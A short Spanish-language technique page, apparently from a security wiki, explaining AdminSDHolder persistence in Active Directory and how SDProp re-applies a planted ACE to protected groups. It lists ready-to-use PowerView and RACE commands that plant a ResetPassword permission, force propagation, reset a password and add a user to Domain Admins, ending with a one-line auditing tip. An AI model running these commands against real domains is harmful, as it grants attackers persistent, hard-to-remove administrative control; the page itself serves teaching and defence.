Qué es
La persistencia con AdminSDHolder abusa de una plantilla de seguridad de Active Directory para reinstalar un permiso privilegiado cada hora. El atacante conserva control sobre los grupos protegidos sin dejar una contraseña que rotar ni una membresía visible que revisar.
Cómo funciona
AdminSDHolder es una plantilla. Su ACL define los permisos correctos de los grupos protegidos, como Domain Admins y Enterprise Admins.
SDProp corre en el controlador con el rol PDC emulator cada 60 minutos. Compara cada grupo protegido contra la plantilla y sobrescribe lo que no coincide.
SDProp confía en la plantilla. No pregunta cómo llegó cada permiso.
El atacante añade su propia ACE a AdminSDHolder, por ejemplo ResetPassword para una cuenta que controla.
En el siguiente ciclo, el controlador estampa esa ACE en Domain Admins y en el resto de grupos protegidos.
Quitar el permiso del grupo no sirve: la ACE vive en la plantilla, no en el grupo. SDProp la repone en su próxima pasada.
Requisito: privilegio alto ya obtenido, con escritura sobre la ACL de AdminSDHolder. Domain Admin lo tiene por defecto.
Comandos
Plantar la ACE en la plantilla con PowerView:
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=<DOMAIN>,DC=<TLD>' -PrincipalIdentity <USER> -Rights ResetPasswordForzar el ciclo de SDProp para no esperar la hora, con el kit RACE:
Invoke-SDPropagator -TimeoutMinutes 1 -ShowProgress -VerboseEjercer el derecho ya propagado, según la ACE plantada, con el módulo AD nativo:
Set-ADAccountPassword -Identity <USER> -Reset -NewPassword (ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force)
Add-ADGroupMember -Identity "Domain Admins" -Members <USER>Alternativa de un solo paso con el kit RACE:
Set-DCPermissions -Method AdminSDHolder -SAMAccountName <USER> -Right ResetPassword -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=<DOMAIN>,DC=<TLD>' -VerboseCómo defenderse
Audita la DACL del objeto AdminSDHolder y alerta ante cualquier cambio en su descriptor: limpiar los grupos protegidos no sirve mientras la ACE siga en la plantilla.